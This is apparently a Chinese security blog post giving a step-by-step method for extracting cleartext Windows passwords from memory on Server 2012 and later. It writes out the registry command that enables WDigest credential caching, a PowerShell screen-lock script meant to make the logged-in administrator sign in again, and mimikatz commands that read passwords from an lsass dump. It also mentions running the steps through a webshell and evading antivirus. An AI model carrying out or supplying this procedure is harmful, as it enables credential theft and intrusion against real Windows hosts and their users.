Windows 2012系统以上的内存明文抓取方法

win2012 怎么读取明文密码呢?

通过修改注册表,然后给予一个锁屏桌面,重新输入密码抓取,大马的话建用大马的CMD命令执行,以下是本地cmd演示

1.执行cmd命令

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

要想复原,只需把1改成0

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

修改注册表之后需要用户注销或者重新登陆之后才会生效

还有办法是快速的,就是强制锁屏,然后管理员重新登陆就要输入密码了,可以新建一个powershell的脚本,报错上传后

执行cmd命令

1.生成脚本名称为 lock-screen.ps1

Function Lock-WorkStation {

$signature = @"

[DllImport("user32.dll", SetLastError = true)]

public static extern bool LockWorkStation();

"@

$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru

$LockWorkStation::LockWorkStation() | Out-Null

}

Lock-WorkStation

2.执行cmd命令

powershell -file lock-screen.ps1

3.把lsass.dmp文件下载放入mimikatz的文件夹中读取

4.依次执行命令

privilege::debug     提升权限
sekurlsa::minidump lsass.dmp    指定文件
sekurlsa::logonpasswords   读取密码

然后就可以读出密码了

总结:

在系统为win10或2012R2以上时,都需要配置注册表并重新登录后才能抓取明文。

优点和缺点:

优点:用procdump导出lsass.dmp后拖回本地抓取密码来规避杀软。

缺点:修改注册表之后,需要重新登录才能生效,可以使用锁屏脚本(锁屏之前,一定要查看管理员是否在线),让管理员重新登录。

© 版权声明
THE END
喜欢就支持一下吧
点赞5 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容